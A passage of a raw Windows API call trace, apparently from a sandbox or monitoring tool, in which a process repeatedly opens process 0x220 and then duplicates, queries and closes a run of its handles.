(dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.765] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.765] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.765] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.766] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.766] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.766] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.767] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.767] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.768] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.768] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.768] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.769] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.769] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.769] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.770] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.770] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.771] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.771] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.771] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.772] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.772] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.772] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.773] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.773] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.774] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.774] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.774] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.775] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.775] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.775] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.776] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.776] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.777] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.777] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.777] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.778] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.778] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.779] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.779] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.779] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.780] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.780] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.780] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.781] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.781] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.782] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.782] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.782] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.783] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.841] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.841] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.851] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.851] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.865] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.865] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.886] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.886] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.886] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.886] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0113.894] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.894] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0113.895] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.895] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x78, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0113.895] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32e40850 [0113.895] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x1, ObjectInformation=0x32e40850, ObjectInformationLength=0x84, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0113.901] CLSIDFromString (in: lpsz="{A3BD3259-3E4F-428a-84C8-F0463A9D3EB5}", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0xa3bd3259, Data2=0x3e4f, Data3=0x428a, Data4=([0]=0x84, [1]=0xc8, [2]=0xf0, [3]=0x46, [4]=0x3a, [5]=0x9d, [6]=0x3e, [7]=0xb5))) returned 0x0 [0113.902] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.902] GetTickCount () returned 0xe86604 [0113.902] GetTickCount () returned 0xe86604 [0113.902] CloseHandle (hObject=0x198) returned 1 [0113.902] GetTickCount () returned 0xe86604 [0113.902] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x278, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.902] GetTickCount () returned 0xe86604 [0113.902] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.903] GetTickCount () returned 0xe86604 [0113.903] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.903] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0113.903] GetTickCount () returned 0xe86604 [0113.903] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0113.903] GetTickCount () returned 0xe86604 [0113.903] CloseHandle (hObject=0x1b8) returned 1 [0113.903] GetTickCount () returned 0xe86604 [0113.903] CloseHandle (hObject=0x198) returned 1 [0113.903] GetTickCount () returned 0xe86604 [0113.904] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x27c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.904] GetTickCount () returned 0xe86604 [0113.904] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.904] GetTickCount () returned 0xe86604 [0113.904] GetTickCount () returned 0xe86604 [0113.904] CloseHandle (hObject=0x1b8) returned 1 [0113.904] GetTickCount () returned 0xe86604 [0113.904] CloseHandle (hObject=0x198) returned 1 [0113.904] GetTickCount () returned 0xe86604 [0113.904] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x280, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.904] GetTickCount () returned 0xe86604 [0113.904] GetTickCount () returned 0xe86604 [0113.904] CloseHandle (hObject=0x198) returned 1 [0113.905] GetTickCount () returned 0xe86604 [0113.905] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x284, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.905] GetTickCount () returned 0xe86604 [0113.905] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.905] GetTickCount () returned 0xe86604 [0113.905] GetTickCount () returned 0xe86604 [0113.905] CloseHandle (hObject=0x1b8) returned 1 [0113.905] GetTickCount () returned 0xe86604 [0113.905] CloseHandle (hObject=0x198) returned 1 [0113.905] GetTickCount () returned 0xe86604 [0113.905] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x288, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.905] GetTickCount () returned 0xe86604 [0113.906] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.906] GetTickCount () returned 0xe86604 [0113.906] GetTickCount () returned 0xe86604 [0113.906] CloseHandle (hObject=0x1b8) returned 1 [0113.906] GetTickCount () returned 0xe86604 [0113.906] CloseHandle (hObject=0x198) returned 1 [0113.906] GetTickCount () returned 0xe86604 [0113.906] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x28c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.906] GetTickCount () returned 0xe86604 [0113.906] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.906] GetTickCount () returned 0xe86604 [0113.906] GetTickCount () returned 0xe86604 [0113.906] CloseHandle (hObject=0x1b8) returned 1 [0113.906] GetTickCount () returned 0xe86604 [0113.907] CloseHandle (hObject=0x198) returned 1 [0113.907] GetTickCount () returned 0xe86604 [0113.907] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x290, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.907] GetTickCount () returned 0xe86604 [0113.907] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.907] GetTickCount () returned 0xe86604 [0113.907] GetTickCount () returned 0xe86604 [0113.907] CloseHandle (hObject=0x1b8) returned 1 [0113.907] GetTickCount () returned 0xe86604 [0113.907] CloseHandle (hObject=0x198) returned 1 [0113.907] GetTickCount () returned 0xe86604 [0113.907] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x294, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.907] GetTickCount () returned 0xe86604 [0113.908] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.908] GetTickCount () returned 0xe86604 [0113.908] GetTickCount () returned 0xe86604 [0113.908] CloseHandle (hObject=0x1b8) returned 1 [0113.908] GetTickCount () returned 0xe86604 [0113.908] CloseHandle (hObject=0x198) returned 1 [0113.908] GetTickCount () returned 0xe86604 [0113.908] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x298, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.908] GetTickCount () returned 0xe86604 [0113.908] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.908] GetTickCount () returned 0xe86604 [0113.908] GetTickCount () returned 0xe86604 [0113.908] CloseHandle (hObject=0x1b8) returned 1 [0113.908] GetTickCount () returned 0xe86604 [0113.909] CloseHandle (hObject=0x198) returned 1 [0113.909] GetTickCount () returned 0xe86604 [0113.909] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x29c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.909] GetTickCount () returned 0xe86604 [0113.909] GetTickCount () returned 0xe86604 [0113.909] CloseHandle (hObject=0x198) returned 1 [0113.909] GetTickCount () returned 0xe86604 [0113.909] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2a0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.909] GetTickCount () returned 0xe86604 [0113.909] GetTickCount () returned 0xe86604 [0113.909] CloseHandle (hObject=0x198) returned 1 [0113.909] GetTickCount () returned 0xe86604 [0113.910] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2a4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.910] GetTickCount () returned 0xe86604 [0113.910] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.910] GetTickCount () returned 0xe86604 [0113.910] GetTickCount () returned 0xe86604 [0113.910] CloseHandle (hObject=0x1b8) returned 1 [0113.910] GetTickCount () returned 0xe86604 [0113.910] CloseHandle (hObject=0x198) returned 1 [0113.910] GetTickCount () returned 0xe86604 [0113.910] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2a8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.910] GetTickCount () returned 0xe86604 [0113.910] GetTickCount () returned 0xe86604 [0113.910] CloseHandle (hObject=0x198) returned 1 [0113.910] GetTickCount () returned 0xe86604 [0113.911] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2ac, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.911] GetTickCount () returned 0xe86604 [0113.911] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.911] GetTickCount () returned 0xe86604 [0113.911] GetTickCount () returned 0xe86604 [0113.911] CloseHandle (hObject=0x1b8) returned 1 [0113.911] GetTickCount () returned 0xe86604 [0113.911] CloseHandle (hObject=0x198) returned 1 [0113.911] GetTickCount () returned 0xe86604 [0113.911] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2b0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.911] GetTickCount () returned 0xe86604 [0113.912] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.912] GetTickCount () returned 0xe86604 [0113.912] GetTickCount () returned 0xe86604 [0113.912] CloseHandle (hObject=0x1b8) returned 1 [0113.912] GetTickCount () returned 0xe86604 [0113.912] CloseHandle (hObject=0x198) returned 1 [0113.912] GetTickCount () returned 0xe86604 [0113.912] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2b4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.912] GetTickCount () returned 0xe86604 [0113.912] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.912] GetTickCount () returned 0xe86604 [0113.913] GetTickCount () returned 0xe86604 [0113.913] CloseHandle (hObject=0x1b8) returned 1 [0113.913] GetTickCount () returned 0xe86604 [0113.913] CloseHandle (hObject=0x198) returned 1 [0113.913] GetTickCount () returned 0xe86604 [0113.913] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2b8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.913] GetTickCount () returned 0xe86604 [0113.913] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.913] GetTickCount () returned 0xe86604 [0113.913] GetTickCount () returned 0xe86614 [0113.913] CloseHandle (hObject=0x1b8) returned 1 [0113.913] GetTickCount () returned 0xe86614 [0113.914] CloseHandle (hObject=0x198) returned 1 [0113.914] GetTickCount () returned 0xe86614 [0113.914] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2bc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.914] GetTickCount () returned 0xe86614 [0113.914] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.914] GetTickCount () returned 0xe86614 [0113.914] GetTickCount () returned 0xe86614 [0113.914] CloseHandle (hObject=0x1b8) returned 1 [0113.914] GetTickCount () returned 0xe86614 [0113.914] CloseHandle (hObject=0x198) returned 1 [0113.914] GetTickCount () returned 0xe86614 [0113.914] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2c0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.915] GetTickCount () returned 0xe86614 [0113.915] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.915] GetTickCount () returned 0xe86614 [0113.915] GetTickCount () returned 0xe86614 [0113.915] CloseHandle (hObject=0x1b8) returned 1 [0113.915] GetTickCount () returned 0xe86614 [0113.915] CloseHandle (hObject=0x198) returned 1 [0113.915] GetTickCount () returned 0xe86614 [0113.915] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2c4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.915] GetTickCount () returned 0xe86614 [0113.915] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.915] GetTickCount () returned 0xe86614 [0113.915] GetTickCount () returned 0xe86614 [0113.915] CloseHandle (hObject=0x1b8) returned 1 [0113.915] GetTickCount () returned 0xe86614 [0113.916] CloseHandle (hObject=0x198) returned 1 [0113.916] GetTickCount () returned 0xe86614 [0113.916] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2c8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.916] GetTickCount () returned 0xe86614 [0113.916] GetTickCount () returned 0xe86614 [0113.916] CloseHandle (hObject=0x198) returned 1 [0113.916] GetTickCount () returned 0xe86614 [0113.916] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2cc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.916] GetTickCount () returned 0xe86614 [0113.916] GetTickCount () returned 0xe86614 [0113.916] CloseHandle (hObject=0x198) returned 1 [0113.916] GetTickCount () returned 0xe86614 [0113.916] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2d0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.916] GetTickCount () returned 0xe86614 [0113.916] GetTickCount () returned 0xe86614 [0113.917] CloseHandle (hObject=0x198) returned 1 [0113.917] GetTickCount () returned 0xe86614 [0113.917] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2d4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.917] GetTickCount () returned 0xe86614 [0113.917] GetTickCount () returned 0xe86614 [0113.917] CloseHandle (hObject=0x198) returned 1 [0113.917] GetTickCount () returned 0xe86614 [0113.917] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2d8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.917] GetTickCount () returned 0xe86614 [0113.917] GetTickCount () returned 0xe86614 [0113.917] CloseHandle (hObject=0x198) returned 1 [0113.917] GetTickCount () returned 0xe86614 [0113.917] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2dc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.918] GetTickCount () returned 0xe86614 [0113.918] GetTickCount () returned 0xe86614 [0113.918] CloseHandle (hObject=0x198) returned 1 [0113.918] GetTickCount () returned 0xe86614 [0113.918] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2e0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.918] GetTickCount () returned 0xe86614 [0113.918] GetTickCount () returned 0xe86614 [0113.918] CloseHandle (hObject=0x198) returned 1 [0113.918] GetTickCount () returned 0xe86614 [0113.918] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2e4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.918] GetTickCount () returned 0xe86614 [0113.918] GetTickCount () returned 0xe86614 [0113.918] CloseHandle (hObject=0x198) returned 1 [0113.919] GetTickCount () returned 0xe86614 [0113.919] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2e8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.919] GetTickCount () returned 0xe86614 [0113.919] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.919] GetTickCount () returned 0xe86614 [0113.919] GetTickCount () returned 0xe86614 [0113.919] CloseHandle (hObject=0x1b8) returned 1 [0113.919] GetTickCount () returned 0xe86614 [0113.919] CloseHandle (hObject=0x198) returned 1 [0113.919] GetTickCount () returned 0xe86614 [0113.919] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x2ec, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, 